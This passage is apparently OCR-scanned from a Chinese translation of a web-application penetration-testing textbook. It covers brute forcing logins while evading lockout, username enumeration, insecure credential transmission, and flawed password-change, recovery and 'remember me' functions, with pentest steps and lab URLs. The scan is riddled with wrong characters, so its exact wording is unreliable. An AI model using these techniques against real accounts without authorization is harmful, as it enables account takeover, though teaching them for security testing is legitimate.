(6) 发 动 奢 力 攻击 前 ， 首 先 确 定 应 用 程序 啊 应 成 功 与 失败 登录 之 间 的 行为 差异 ， 以 此 分 清 
它们 在 目 动 攻击 过 程 中 表现 出 的 区 别 。 

(7) 列 出 已 枚 举 出 的 或 常见 的 用 户 名 列表 和 第 用 密码 列表 。 根 据 所 获得 的 任何 有 关 密 人 码 强 
度 规则 的 信息 对 上 述 列 表 加 以 修改 ， 以 避免 进行 多 余 测试 。 

(8) 使 用 这 些 用 户 名 和 密码 的 各 种 排列 组 合 ， 通 过 适当 的 工具 或 定制 脚本 迅速 生成 登录 请 
求 。 监控 服务 硕 啊 应 以 确定 成 功 的 登录 和 尝试。 我们 将 在 第 14 章 详细 说 明 使 用 自动 化 方法 实施 定 
制 攻 击 的 各 种 技巧 和 工具 。 

(9) 如 果 一 次 针对 儿 个 用 户 名 ， 通 剃 最 好 以 广度 优先 ( breadth-first ) 而 非 深度 优先 ( depth- 
first ) 的 方式 实施 这 种 蛋 力 攻击 。 这 包括 循环 使 用 一 组 密码 ( 从 最 常用 的 密码 开始 ) 并 轮流 对 
每 个 用 户 名 使 用 每 一 个 密码 。 这 种 方法 有 两 方面 的 好 处 : 首先 ,可 以 更 加 迅速 地 确定 使 用 笛 用 
密码 的 账户 ; 其 次 , 这 样 做 可 以 降低 触发 任何 账户 锁定 防御 的 可 能 性 ， 因 为 在 使 用 同一 个 账户 
进行 连续 登录 之 间 存 在 时 间 延 玉 。 


尝试 访问 
http://mdsec.net/auth/16/ 
http://mdsec.net/auth/32/ 
http://mdsec.net/auth/46/ 
http://mdsec.net/auth/49/ 
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6.2.3 详细 的 失败 消息 


一 个 典型 的 登录 表单 要 求 用 户 输入 两 组 信息 (用户 名 和 密码 ) ， 而 邦 外 一 些 应 用 程序 则 需要 
观 多 信息 ( 如 出 生日 期 、 纪 念 地 或 PIN 号 人 码 ) 。 

如 果 登 录 答 试 失败 ， 当 然 可 以 得 出 绪论 : 至 少 有 一 组 信息 出 错 。 但 是 ， 如 果 应 用 程序 通知 是 
哪 一 组 信息 无 效 ， 就 可 以 利用 它 显 车 降低 登录 机 制 的 防御 效能 。 

在 最 简单 的 情况 下 , 如 果 只 需要 用 户 名 和 密码 登录 ,应 用 程序 可 能 会 通过 指出 失败 的 原因 ( 用 
户 名 无 效 或 密码 错误 ) 来 啊 应 失败 的 登录 竺 试 ， 如 图 6-3 所 示 。 
































Username: daf Username: zzz 


Password: Password: 


Password is incorrect. User is not recognised. 








图 6-3 ”详细 的 登录 失败 消息 指出 已 猜测 出 有 效 的 用 户 名 


在 这 种 情况 下， 攻击 者 可 以 发 动 一 次 日 动 化 攻击 ,所 历 大 量 第 见 的 用 户 名 ， 确 定 哪些 有 效 。 
当然 ， 用户 名 一 般 并 非 秘 密 ( 例如 ， 登录 时 并 不 隐藏 用 户 名 ) 。 但 是 ， 如 采 攻 击 者 能 够 轻易 确定 
有 效 的 用 户 名 ,就 更 可 能 在 有 限 的 时 间 内 、 运 用 一 定 的 技能 、 付 出 一 定 的 精力 攻破 应 用 程序 ， 并 
将 枚 举 出 的 用 户 名 列表 作为 随后 各 种 攻击 的 基础 ， 包括 密码 猜测 、 攻 击 用 户 数据 或 会 话 , 或 者 社 
会 工程 "。 

除 主要 的 登录 功能 外 ,还 可 以 对 验证 机 制 的 其 他 组 件 进行 用 户 名 枚 举 。 理论 上 , 需要 提交 真 
实 或 潜在 用 户 名 的 任何 功能 者 可 用 于 这 一 目的 。 例 如, 通 闸 郡 可 以 对 用 户 注 册 功 能 进行 用 户 名 枚 
举 。 如 采 应 用 程序 允许 新 用 户 注 册 并 指定 他 们 目 己 的 用 户 和 名, 由 于 应 用 程序 需要 防止 注册 重复 用 
户 名 ,在 这 种 情况 下 ， 儿 乎 不 可 能 阻止 用 户 名 枚 举 攻击 。 如 本 章 后 面部 分 所 述 ， 有 时 也 可 以 对 密 
人 码 修改 或 筷 记 和 密码 功能 进行 用 户 名 枚 举 。 












































注解 许多 验证 机 制 以 隐 含 或 明确 的 方式 提示 用 户 名 。 根 据 设 计 第 识 ，Web 邮 件 账 
户 的 用 户 名 通常 为 电子 邮件 地 址 。 许 多 其 他 站 点 在 应 用 程序 中 透露 用 户 名 ， 或 者 允 


许 使 用 可 轻易 猜测 出 的 用 户 名 (如 user1842，User1843 等 )， 并 未 考虑 攻击 者 会 对 
其 加 以 利用 的 情况 。 














在 更 复杂 的 登录 机 制 中 ,应 用 程序 要 求 用 户 提交 儿 组 信息 ,或 者 完成 几 个 步 纤 。 这 时 ， 评 细 
的 失败 消息 或 差异 点 可 帮助 攻击 者 轮流 针对 登录 过 程 的 每 个 阶段 发 动 攻击 , 提 蜗 其 获得 未 授权 访 
问 的 可 能 性 。 











由 社会 工程 ( Social Engineering ) 是 一 种 利用 人 的 弱点 ( 如 入 的 本 能 反应 、 好 奇 心 、 信 任 、 贪 禁 等 进行 诸如 欺骗 、 伤 害 等 
危害 手段 ) ， 获 取 上 自身 利益 的 攻击 方法 。 一 一 译 者 注 
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注解 ”这 种 漏洞 可 能 会 以 更 隐 含 的 形式 出 现 。 即 使 响应 有 效 和 无 效用 户 名 的 错误 消息 
表面 看 来 完全 相同 ， 它 们 之 间 仍 然 存 在 细微 的 差别 ， 可 用 于 枚 举 有 效 的 用 户 名 。 例 如 ， 
如 果 应 用 程序 中 的 多 条 代码 路 径 返 回 “相同 的 ”失败 消息 ， 这 些 消息 之 间 仍 然 可 能 存 
在 细小 的 排版 差异 。 有 些 时 候 ， 应 用 程序 响应 在 屏幕 上 显示 的 内 容 完 全 相同 ， 但 其 
HTML 源 代码 可 能 隐藏 着 细微 的 区 别 ， 如 注释 或 布局 方面 的 不 同 。 如 果 无 法 轻易 枚 举 
出 有 效 的 用 户 名 ， 应 当 仔细 比较 应 用 程序 对 有 效 和 无 效用 户 名 作出 的 响应 。 

可 以 使 用 Burp Suite 中 的 “比较 ”( Comparer ) 工具 自动 分 析 并 突出 显示 两 个 应 用 
程序 响应 之 间 的 差异 ， 如 图 6-4 所 示 。 这 有 助 于 迅速 确定 有 效 的 用 户 名 是 否 会 导致 应 用 
程序 的 响应 出 现任 何 系统 性 的 差异 。 





= 一 - - 2 
$ word compare of #1 and #2 (4 differences) | 一 -| 号 -| 攻 醒 


[| 


Length: 1.597 @i text (» hex Length: 1+.591 ®) text OO) hex 
name="ysername”" type="text" [=| name="username” type="text" [= 
value="W /<itd><td>g&nbsp:<fitd><fr><tr><td>Password:<iid> | | |value-"B/><id><td>g&nbsp.</td></tr><tr><td>Password:</td><td | | 
| <td><input name="password" type="password" ><iNput name="password" type="password" 
|value=™/></td><td><input type="submit" value="Login” lvalue=™/><fd><td><input type="submit’ value="Login” 
<ftd><ftr><ftable></form><br/><a |<Hd><ftr><itable></form><bri><a 
href="Register.ashx">Register=</a><=br><br><hr>Login failed. href="Register.ashx>Register</a><br><br><hr>Login failed. 
Please note that accounts are disabled for a shorttime following 一 - Pleasenote that accounts are disabled for a shorttime following 
| several unsuccessful logins 几 本 Bbody=></html> | 一 | several unsuccessful logins 轩 body=</html> 


key Mogied EG added 
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三 | 





_] sync views 


图 6-4 使 用 Burp Suite 确 定 应 用 程序 啊 应 的 细微 差别 


渗透 测试 步骤 

(1) 如 采 已 经 车 道 一 个 有 效 的 用 局 名 《例如 一 个 受 控制 的 账 局 ) ,使 用 这 个 用 必 名 和 一 个 
错误 的 密码 进行 一 次 登录 ， 然 后 使 用 一 个 完全 随机 的 用 户 名 进行 为 一 次 登录 。 

(2) 记录 服务 冀 啊 应 两 次 登录 尝试 的 每 一 个 细 广 ， 包 括 状态 人 码 、 任 何 重 定向 、 屏 硕 上 显示 
的 信息 以 及 任何 隐藏 在 HITML 页 面 中 的 差异 。 使 用 拦截 代理 服务 着 保存 服务 而 上 来 回流 量 的 完 
整 历史 记录 。 

(3) 努力 找 出 服务 化 啊 应 两 次 登录 答 试 的 任何 明显 或 细微 的 差异 。 

(4) 如 宁 无 法 发 现任 何 差 异 ， 在 应 用 程序 中 任何 提交 用 户 名 的 地 方 〈 例 如 自我 注册 、 密 码 
修改 与 筷 记 密码 功能 ) 重复 上 述 操作 。 

(5) 如 果 发 现 服务 希 啊 应 有 效 和 无 效用 户 名 之 间 的 差异 ， 收 集 一 个 常见 用 户 名 列表 并 使 用 
一 个 定制 脚本 或 目 动工 具 迅 速 提 交 每 个 用 户 名 ， 过 滤 出 说 明 用 户 名 有 效 的 啊 应 〈 请 参阅 第 14 
草 了 解 相 关内 容 ) 。 

(6) 开始 枚 举 操作 之 前 ， 请 确定 应 用 程序 是 否 在 登录 尝试 失败 次 数 达 到 一 定数 目 后 执行 账 
户 锁定 〈 请 参阅 6.2.2 节 ) 。 如 有 果 应 用 程序 执行 账 己 锁定， 最 好 在 设计 枚 举 攻击 时 记 住 这 一 点 。 
例如 ， 如 果 应 用 程序 只 允许 登录 某 个 账户 时 失败 3 次 ， 可 能 就 会 在 使 用 通过 日 动 枚 举 发 现 的 每 
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个 用 户 名 登录 时 “浪费 ”一 次 登录 机 会 。 因 此 ， 当 进行 枚 举 攻 击 时 ,不 要 在 每 次 登录 时 提交 完 
全 不 合理 的 密码 ， 而 是 提交 常见 的 密码 ， 如 password1 或 以 用 户 名 为 密码 。 如 果 应 用 程序 执行 
脆弱 的 密码 强度 规则 , 在 枚 举 操 作 过 程 中 执行 的 一 些 登录 尝试 就 很 可 能 会 取得 成 功 ， 有 些 情 况 
下 还 可 能 同时 查 明 用 户 名 和 密码 。 要 以 用 户 名 设置 密码 字段 ， 可 以 使 用 Burp Intruder 中 的 “ 破 
城 想 ”《〈Pbattering ram ) 攻击 模式 ， 在 登录 请 求 的 几 个 位 置 插入 相同 的 有 效 载 倍 。 























即使 应 用 程序 对 包含 有 效 与 无 效用 户 名 登录 尝试 的 响应 完全 相同 , 我 们 仍然 可 以 根据 应 用 程 
序 响应 登录 请 求 的 时 间 枚 举 出 用 户 名 。 应 用 程序 通常 依据 登录 请 求 是 否 包 含有 效用 户 名 , 对 其 进 
行 截 然 不 同 的 后 端 处 理 。 例 如 ， 如 果 登 录 请 求 中 包含 一 个 有 效 的 用 户 名 ， 应 用 程序 可 能 会 从 后 端 
数据 库 中 获取 用 户 资 料 ， 对 这 些 资料 进行 各 种 处 理 ( 如 检查 账户 是 否 到 期 )， 然 后 确认 密码 (可 
能 使 用 一 个 资源 密集 型 散 列 算法 )， 如 果 密 码 错误 返回 一 条 常规 消息 。 仅 仅 使 用 浏览 器 可 能 无 法 
检测 出 应 用 程序 处 理 两 个 请 求 之 间 的 时 间 差 异 , 但 自动 工具 能 够 区 分 这 种 差异 。 即 使 这 种 操作 会 
产生 大 量 错误 警报 ， 但 100 个 用 户 名 约 50% 的 有 效率 仍然 要 强 于 10 000 个 用 户 名 仅 0.5% 的 有 效率 。 
第 1$ 章 将 详细 讨论 如 何 检 测 并 利用 这 种 时 间 差 异 从 应 用 程序 中 提取 信息 。 









































提示 除 登 录 功 能 外 ， 我 们 还 可 以 从 其 他 地 方 获取 有 效 的 用 户 名 。 检 查 在 应 用 程序 解 
| 析 过 程 中 (请 参阅 第 4 章 了 解 相关 内 容 ) 发 现 的 所 有 源 代码 注释 ， 确 定 所 有 明显 的 用 户 


名 。 开 发 者 或 组 织 内 部 内 其 他 人 员 的 电子 邮件 地 址 都 可 能 为 有 效 的 用 户 名 ; 任何 可 访 
问 的 日 志 功 能 也 可 能 透露 用 户 名 。 


尝试 访问 





http://mdsec.net/auth/53/ 
http://mdsec.net/auth/59/ 
http://mdsec.net/auth/70/ 
http://mdsec.net/auth/81/ 
http://mdsec.net/auth/167/ 


6.2.4 ”证 书 传输 易 受 攻击 


如 果 应 用 程序 使 用 非 加 密 的 HTTP 连 接 传输 登录 证 书 ， 人 处 于 网 络 适 当 位 置 的 镭 听 者 当然 就 能 
够 拦截 这 些 证 书 。 根 据 用 户 的 位 置 ， 欠 听 者 可 能 位 于 : 

口 用 户 的 本 地 网 络 中 ; 

口 用 户 的 IT 部 门 内 ; 

口 用 户 的 ISP 内 ; 

口 因特网 骨干 网 上 ; 
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口 托管 应 用 程序 的 ISP 内 ; 
口 管理 应 用 程序 的 IT 部 门 内 。 


注解 上 述 任 何 一 个 位 置 可 能 由 授权 用 户 占 用 ， 也 可 能 由 通过 其 他 方法 攻破 相关 基础 
架构 的 外 部 攻击 者 占用 。 即 使 某 一 特定 网 络 的 中 间 媒 介 可 人 和信， 最 好 还 是 使 用 安全 的 传 


输 机 制 传送 敏感 数据 。 














即使 是 通过 HTTPS 登 录 , 如 果 应 用 程序 处 理 证 书 的 方式 并 不 安全 , 证 书 仍 有 可 能 被 泄露 给 霖 
授权 方 。 
口 如 果 以 查询 字符 串 参 数 、 而 不 是 在 PosT 请 求 主体 中 传送 证 书 ， 许 多 地 方 都 可 能 记录 这 些 
证 书 , 例如 用 户 的 浏览 硕 历 史记 录 中 、Web 服 务 硕 日 志 内 以 及 主机 基础 巢 构 采用 的 任何 反 
问 代 理 中 。 如 果 攻 击 者 成 功 攻破 这 些 资 源 ， 就 能 够 获取 保存 在 这 些 地 方 的 用 户 证书 ， 从 
而 提升 其 访问 权限 。 
口 虽然 大 多 数 Web 应 用 程序 确实 使 用 posT 请 求 主体 提交 HTML 登 录 表 单 ， 但 令 人 奇怪 的 
是 , 应 用 程序 常 弟 通 过 重 定 问 到 一 个 不 同 的 URL 来 处 理 登 录 请 求 ， 而 以 查询 字符 串 参 数 
的 形式 提交 证 书 。 我 们 并 不 清楚 应 用 程序 开发 者 为 何 采 用 这 种 方法 , 但 以 连接 一 个 URL 
的 302 重 定 问 执行 请 求 , 比 使 用 为 一 个 通过 JavaScript 提 交 的 HTML 表 单 提出 posT 请 求 要 
容易 得 多 。 
口 Web 应 用 程序 有 时 将 用 户 证 书 保存 在 cookie 中 ， 通常 是 为 了 执行 设计 不 佳 的 登录 、 密 码 修 
改 、“ 记 住 我 ”等 机 制 。 攻击 者 通过 攻击 用 户 cookie 即 可 获取 这 些 证 书 。 如 果 cookie 相 对 安 
全 可 靠 ， 可 通过 访问 客户 并 的 本 地 文件 系统 获得 它们 。 即 使 证 书 被 加 密 ， 攻 击 者 仍然 不 
需要 用 户 证 书 就 可 以 通过 重新 传送 cookie 实 施 登 录 。 第 12 草 和 第 13 章 将 描述 攻击 者 如 何 通 
过 各 种 方法 获取 其 他 用 户 的 cookie。 
许多 应 用 程序 对 应 用 程序 中 未 经 验证 的 区 域 使 用 HTTP， 而 在 登录 时 转 而 使 用 HTTPS。 如 末 
是 这 样 , 应 在 向 浏览 器 加 载 登 录 页 面 时 转换 到 HTTPS, 使 得 用 户 能 够 在 输入 证 书 前 核实 页 面 是 否 
真实 可 信 。 但 是 , 一 些 应 用 程序 通常 使 用 HTTP 加 载 登录 页 面 ， 而 在 提交 证 书 时 才 转 换 到 HTTPS。 
这 样 做 是 不 安全 的 ， 因 为 用 户 不 能 核实 登录 页 面 的 破 实 性 ， 因 此 无 法 保证 安全 提交 证 书 。 那 么 ， 
处 在 适当 位 置 的 攻击 者 就 可 以 拦截 并 修改 登录 页 面 ， 更 改 登录 表单 的 目标 URL 以 使 用 HTTP。 等 
到 精明 的 用 户 意识 到 证 书 已 使 用 HTTP 提 交 时 ， 攻 击 者 已 成 功 获 取 这 些 证 书 。 




























































































渗透 测试 步 又 

(1) 进行 一 次 成 功 登 录 ， 监 控 客 户 站 与 服务 着 之 间 的 所 有 来 回流 量 。 

(2) 确定 在 来 回 方向 传输 证 书 的 每 一 种 情况 。 可 以 在 拦截 代理 服务 侣 中 设置 拦截 规则 ， 标 
记 包 含 特殊 字符 串 的 消息 〈 请 参阅 第 20 章 了 解 相 关内 容 ) 。 











(3) 如 果 发 现 通 过 URL 查 询 字 符 串 或 者 以 cookie 的 方式 提交 证 书 , 或 者 由 服务 器 向 客户 端 传 
输 证 书 的 任何 情 交 ， 了 解 传 输 的 一 切 细节 并 设法 卉 清 应 用 程序 开发 者 这 样 做 的 目的 。 设 法 查 明 
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攻击 者 干扰 应 用 程序 逻辑 以 获取 其 他 用 户 证 书 的 各 种 手段 。 

(4) 如 果 通 过 非 加 密 渠道 传输 任何 敏感 信息 ， 这 样 做 当然 容易 遭受 攻击 。 

(5) 如 果 没 有 发 现 证 书 传输 不 安全 的 情况 ， 留 意 任何 明显 被 编码 或 模糊 处 理 的 数据 。 如 果 
这 些 数据 中 包括 敏感 数据 ， 其 模糊 算法 可 能 遭受 逆 癌 工程 。 

(6) 如 果 使 用 HTTPS 提 交 证 书 , 但 使 用 HTTP 加 载 登 录 表 单 ,， 那么 应 用 程序 就 容易 遭受 中 间 
人 攻击 ， 攻 击 考 也 可 能 使 用 这 种 攻击 手段 获取 证 书 。 

















尝试 访问 


http://mdsec.net/auth/88/ 
http://mdsec.net/auth/90/ 
http://mdsec.net/auth/97/ 


6.2.5 ”密码 修改 功能 


令 人 奇怪 的 是 ， 许 多 Web 应 用 程序 并 不 允许 用 户 修改 其 密码 。 但 是 ， 出 于 两 个 方面 的 原因 ， 
精心 设计 的 验证 机 制 需 要 这 种 功能 。 
口 定期 强制 修改 密码 可 降低 某 一 密码 成 为 密码 猜测 攻击 目标 的 可 能 性 ， 同 时 降低 攻击 者 不 
需要 检测 即 可 使 用 被 攻破 密码 的 可 能 性 ， 由 此 降低 密码 被 攻击 的 概率 。 
口 怀疑 目 己 的 密码 已 被 攻破 的 用 户 需 要 立即 修改 密码 ， 以 降低 未 授权 使 用 概率 。 
虽然 密码 修改 功能 是 一 个 融 效 验证 机 制 的 必要 组 成 部 分 , 但 从 设计 来 看 , 它 往往 易于 遭受 攻 
击 。 在 主要 登录 功能 中 特 童 避 人 锡 的 源 洞 通 第 在 密码 修改 功能 中 重复 出 现 。 许 多 Web 应 用 程序 的 密 
人 码 修改 功能 不 需要 验证 即 可 访问 ， 并 为 攻击 者 提供 条 些 信息 或 允许 攻击 者 执行 朱 些 操作 。 
口 提供 详细 的 错误 消息 ， 说 明 被 请 求 的 用 户 名 是 否 有 效 。 
口 允许 攻击 者 无 限制 猜测 “ 现 有 密码 ”字段 。 
D 在 验证 现 有 密码 后 ， 仅 检查 “新 密码 ”与 “确认 新 密码 ”字段 的 值 是 否 相 同 ， 人 允许 攻击 
者 不 需 和 人 侵 即 可 成 功 碍 明 现 有 密码 。 
典型 的 密码 修改 功能 通 第 包含 一 个 相对 较 大 的 欣 辑 判定 树 。 应 用 程序 知 要 确认 用 户 、 验 证 提 
供 的 现 有 密码 、 集 成 任何 账户 锁定 防御 、 对 提交 的 新 密码 进行 相互 比较 并 根据 密码 强度 规则 进行 
比较 ,以 及 以 适当 的 方式 向 用 户 返 回 任何 错误 条 件 。 为 此 ， 密 人 码 修改 功能 通常 包含 难以 察觉 的 可 
用 于 破坏 整个 机 制 的 逻辑 缺陷 。 





















































渗透 测试 步 又 


(1) 确定 应 用 程序 中 的 所 有 密码 修改 功能 。 即 使 公布 的 内 容 (published content ) 中 没有 明 





硝 的 密码 修改 功能 链接 ， 应 用 程序 仍然 可 能 实施 这 种 功能 。 我 们 已 在 第 4 章 中 说 明了 发 现 应 用 
程序 中 隐藏 内 容 的 各 种 技巧 。 








0.2 ”验证 机 制 设计 缺陷 125 


(2) 使 用 无 效 的 用 户 名 、 无 效 的 现 有 密码 及 不 匹配 的 “新 密码 ”和 “确认 新 密码 ” 值 癌 密 
人 码 修改 功能 提交 各 种 请 求 。 
(3) 设法 确定 任何 可 用 于 用 户 名 枚 举 或 蛮 力 攻击 的 行为 ( 如 6.2.2 市 和 6.2.3 市 所 述 ) 。 





提示 。 如果 密码 修改 表单 只 可 由 验证 用 户 访问 ， 且 其 中 并 无 用 户 名 字段 ， 表 单 中 仍 有 
Y 可 能 包含 一 个 任意 用 户 名 ,表单 可 能 将 用 户 名 保存 在 一 个 可 被 轻易 修改 的 隐藏 字段 中 。 


如 果 在 字段 中 没有 发 现 用 户 名 ， 设 法 使 用 和 主 登 录 表 单 中 相同 的 参数 提交 另 一 个 包含 
用 户 名 的 参数 。 这 种 技巧 有 时 可 成 功 履 盖 当 前 用 户 的 用 户 名 ， 使 攻击 者 能 够 向 其 他 用 
户 的 证 书 发 动 变 力 攻击 ， 即 使 在 主 登 录 页 面 不 可 能 实施 这 种 攻击 。 





http://mdsec.net/auth/104/ 
http://mdsec.net/auth/117/ 
http://mdsec.net/auth/120/ 
http://mdsec.net/auth/125/ 
http://mdsec.net/auth/129/ 
http://mdsec.net/auth/135/ 





与 密码 修改 功能 一 梓 ， 重 新 获得 起 记 密 公 的 机 制 第 瘦 会 3 引入 已 在 主要 登录 功能 中 避免 的 问 
如 ， 如 用 户 名 枚 举 。 
除 这 种 缺陷 外 , 忘记 密码 功能 设计 方面 的 缺点 往 往 使 它 成 为 应 用 程序 总 体验 证 逻辑 中 最 薄 纶 
的 环节 。 下 面 介绍 几 种 常见 的 设计 缺点 。 
口 态 记 密码 功能 第 第 回 用 户 提 出 一 个 次 要 质询 以 代 荡 主要 登录 功能 ， 如 图 6-5 所 示 。 与 试图 
译 测 用 户 密 码 相 比 ， 啊 应 这 种 质询 对 攻击 者 来 说 更 容易 一 些 。 母 亲 的 尹 家 姓 、 纪 念 日 、 
最 襄 欢 的 闫 色 等 问题 的 答案 要 比 可 能 的 密码 的 数量 少 得 多 。 而 且 ， 这 些 问 题 的 党 宁 津 第 
































隐藏 在 公开 的 信息 中 ， 意 志 坚 定 的 攻击 者 无 须 化 费 多 大 精力 即 可 找到 答案 。 


Forgot Your Password or User ID > 


User ld: Tim 
Vyhen you registered your User ld, You provided a secret question 
Your secret question, provided during registration, is: 


what street did You live on In silerra vista 


Enter the answer to your secret question: 








图 6-5 ”账户 恢复 功能 中 的 次 要 质询 





许多 时 候 ， 应 用 程序 允许 用 户 在 注册 阶段 设 定 他 们 自己 的 密码 恢复 质询 与 啊 应 ， 而 用 户 

很 有 可 能 会 设置 极其 不 安全 的 质询 ， 这 也 许 是 因为 用 户 错误 地 认为 应 用 程序 仪 回 他 们 日 

己 提出 这 些 质 询 ， 例 如 :“ 我 拥有 一 只 船 吗 ?” ”在 这 种 情况 下 ， 乔 望 获得 访问 权 的 攻击 者 

可 使 用 自动 攻击 手段 遍历 一 组 已 枚 举 的 或 常见 的 用 户 名 ， 记 录 所 有 密码 恢复 质询 ， 并 选 

择 那 些 看 似 最 容易 猜测 出 的 质询 发 动 攻 击 。( 请 参阅 第 14 音 了解 有 关 如 何在 自 定 义 攻击 

中 获取 这 类 数据 的 技巧 。) 

口 与 密码 修改 功能 一 样 ， 即 使 应 用 程序 开发 者 在 主 登 录 页 面 阻止 攻击 者 加 密码 恢复 质询 的 
响应 发 动 蛮 力 攻击 ， 他 们 也 往往 会 在 忘记 密码 功能 中 忽略 这 种 攻击 的 可 能 性 。 如 果 应 用 
程序 允许 无 限制 地 回答 密码 恢复 质询 ， 那 么 意志 坚定 的 攻击 者 就 很 可 能 会 攻破 这 个 密码 。 

口 一 些 应 用 程序 使 用 一 个 简单 的 密码 “暗示 ”( 可 由 用 户 在 注册 阶段 配置 ) 代替 恢复 质询 。 
由 于 用 户 错 误 地 认为 只 有 自己 才 会 看 到 这 些 上 暗示， 他 们 往往 设置 非常 明显 的 暗示 ， 甚 至 
是 和 密码 完全 相同 的 上 暗示。 此 外 ， 拥 有 一 组 常见 或 已 枚 举 出 的 用 户 名 的 攻击 者 可 轻易 获 
取 大 量 密码 暗示 ， 然 后 开始 实施 猜测 。 

口 在 用 户 正 确 啊 应 一 个 质询 后 ， 应 用 程序 即 允 许 用 户 重新 控制 他 们 的 账户 ， 这 种 机 制 非常 
容易 遭受 攻击 。 执 行 这 种 机 制 的 一 个 相对 安全 的 方法 是 向 用 户 在 注册 阶段 提供 的 电子 邮 
件 地 址 发 送 一 个 唯一 的 、 无 法 猜测 的 、 存 在 时 间 限 制 的 恢复 URL。 用 户 在 儿 分 钟 内 访问 
这 个 URL 即 可 设置 一 个 新 密码 。 但 是 ， 我 们 常常 会 遇 到 其 他 一 些 在 设计 上 存在 缺陷 的 账 
户 恢复 机 制 。 

一 些 应 用 程序 在 用 户 成 功 啊 应 一 个 质询 后 即 向 其 透露 现 有 与 遗忘 的 密码 ， 使 攻击 者 能 
人 够 无 限制 地 使 用 该 账户 ， 而 不 会 被 账户 所 有 者 检测 出 来 。 即 使 三 户 所 有 者 随后 修改 被 
攻破 的 密码 ， 攻 击 者 只 需 重新 回答 相同 的 质询 即 可 获得 新 密码 。 

一 些 应 用 程序 在 用 户 成 功 完成 一 个 质询 后 ， 立 即 让 其 进入 一 个 不 需 验 证 的 会 话 。 这 同 
样 使 攻击 者 可 无 限制 地 使 用 该 账户 ， 而 不 会 被 账户 所 有 者 检测 出 来 ， 甚 至 不 需要 知道 
用 户 的 密码 。 

四 -一些 应 用 程序 采用 发 送 一 个 唯一 恢复 URE 的 机 制 ， 但 却 将 这 个 URE 发 送 至 用 户 在 完成 
质询 时 指定 的 电子 邮件 地 址 中 。 除 能 够 记录 攻击 者 所 使 用 的 电子 邮件 地 址 外 ， 这 种 方 
法 根本 无 法 提高 恢复 过 程 的 安全 性 。 













































































提示 。 即使 应 用 程序 并 未 提供 一 个 在 屏幕 上 显示 的 字段 ， 要 求 用 户 输 入 接收 恢复 URL 
Y 的 电子 邮件 地 址 , 它 仍 有 可 能 通过 一 个 隐藏 表单 字段 或 cookie 传 送 这 个 地 址 。 攻击 者 因 


此 获得 双重 机 会 : 一 方面 ， 可 以 发 现 所 攻破 的 用 户 的 电子 邮件 地 址 ; 另 一 方面 ， 可 对 
这 个 地 址 进行 修改 ， 用 自选 的 地 址 接收 恢复 URL。 





昌 一 些 应 用 程序 允许 用 户 在 成 功 完成 一 个 质询 后 生 接 重新 设置 密码 ， 并 且 不 回 用 户 发 送 
任何 电子 邮件 通知 。 这 意味 看 下 到 所 有 者 碰巧 再 次 登录 时 才 会 注意 到 账户 被 攻击 者 攻 
破 ; 而 且 ， 如 条 所 有 者 认为 目 己 一 定 是 乐 记 了 密码 ， 于 是 用 上 述 方法 重新 设置 密码 ， 
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他 可 能 仍然 无 法 发 觉 账 户 已 被 攻破 。 那 么 ， 只 是 希望 偶尔 访问 应 用 程序 的 攻击 者 束 可 
以 在 一 段 时 间 攻 破 一 个 用 户 账 尸 ， 在 为 一 段 时 间 攻 破 为 一 个 不 同 用 户 的 账户 ， 从 而 继 
续 无 限制 地 使 用 该 应 用 程序 。 








渗透 测试 步 又 


(1) 确定 应 用 程序 中 的 所 有 息 记 密码 功能 。 即 使 公布 的 内 容 中 没有 明确 的 忘记 密码 功能 链 








接 ， 应 用 程序 仍然 可 能 实施 这 种 功能 ( 请 参阅 第 4 章 了 解 相 关内 容 ) 。 

(2) 使 用 受 控制 的 账户 执行 一 次 完整 的 密码 恢复 过 程 ， 了 解 忘 记 密 人 码 功 能 的 工作 机 制 。 

(3) 如 果 恢 复 机 制 使 用 质询 ， 确 定 用 户 是 否 能 够 设 定 或 选择 他 们 自己 的 质询 与 啊 应 。 如 果 
用 户 可 设 定 或 选择 自己 的 质询 与 响应 , 使 用 一 组 已 枚 举 的 或 常见 的 用 户 名 获取 一 些 质 询 , 并 对 
其 进行 分 析 ， 找 出 任何 非常 容易 猜测 出 啊 应 的 质询 。 

(4) 如 果 恢 复 机 制 使 用 密码 “暗示 ”， 采 取 和 上 个 步 又 相同 的 操作 获得 一 组 密码 暗示 ， 并 
对 任何 可 轻易 猜测 出 答案 的 暗示 发 动 攻击 。 

(5) 设 法 确定 忘记 密码 机 制 中 任何 可 用 于 用 户 名 枚 举 或 蛋 力 攻击 的 行为 (详情 请 参阅 上 文 ) 。 

(6) 如 果 应 用 程序 在 忘记 密码 请 求 的 响应 中 生成 一 封包 含 恢复 URL 的 电子 邮件 ， 获 取 大 量 
这 类 URL, 并 试图 确定 任何 可 帮助 预测 向 其 他 用 户 发 布 UREL 的 模式 。 请 使 用 和 分 析 会 话 令 牌 以 
实现 预测 相同 的 技巧 〈 请 参阅 第 7 曹 了 解 相关 内 容 ) 。 























尝试 访问 
http://mdsec.net/auth/142/ 


http://mdsec.net/auth/145/ 
http://mdsec.net/auth/151/ 


6.2.7 “ 记 住 我 ”功能 


为 方便 用 户 , 避免 他 们 每 次 在 一 台 特 定 的 计算 机 上 使 用 应 用 程序 时 需要 重复 输入 用 户 名 和 和 密 
码 ， 应 用 程序 通 稍 执行 “ 记 住 我 ”功能 。 这 些 功能 在 设计 上 并 不 安全 ， 致 使 用 户 易 于 遭 受 本 地 和 
其 他 计算 机 用 户 的 攻击 。 

口 一 些 “ 记 住 我 ”功能 通过 一 个 简单 的 cookie 执 行 ， 如 RememberUser=petetrwienetr ( 见 

图 6-6 )。 回 初始 应 用 程序 页 面 提 交 这 个 cookie 时 ， 应 用 程序 信任 该 cookie， 认 为 其 属于 通 
过 验证 的 用 户 ， 并 为 该 用 户 建立 一 个 应 用 程序 会 话 ， 从 而 避 开 登录 过 程 。 攻 击 者 可 以 使 
用 一 组 常见 或 已 枚 举 出 的 用 户 名 ， 不 需要 任何 验证 即 可 完全 访问 应 用 程序 。 

口 一 些 “ 记 住 我 ”功能 设置 一 个 cookie， 其 中 并 不 包含 用 户 名 ， 而 是 使 用 一 个 持久 会 话 标 识 
和 件 ， 例 如 RememberUser=1328。 问 登录 页 面 提交 这 个 标识 符 时 ， 应 用 程序 查询 与 其 相关 
的 用 户 ， 并 为 该 用 户 建立 一 个 应 用 程序 会 话 。 和 普通 会 话 令 牌 一 样 ， 如 果 可 预测 或 推断 出 
其 他 用 户 的 会 话 标 识 符 ,攻击 者 就 可 以 遍历 大 量 可 能 的 标识 从 ,找到 与 应 用 程序 用 户 相 关 
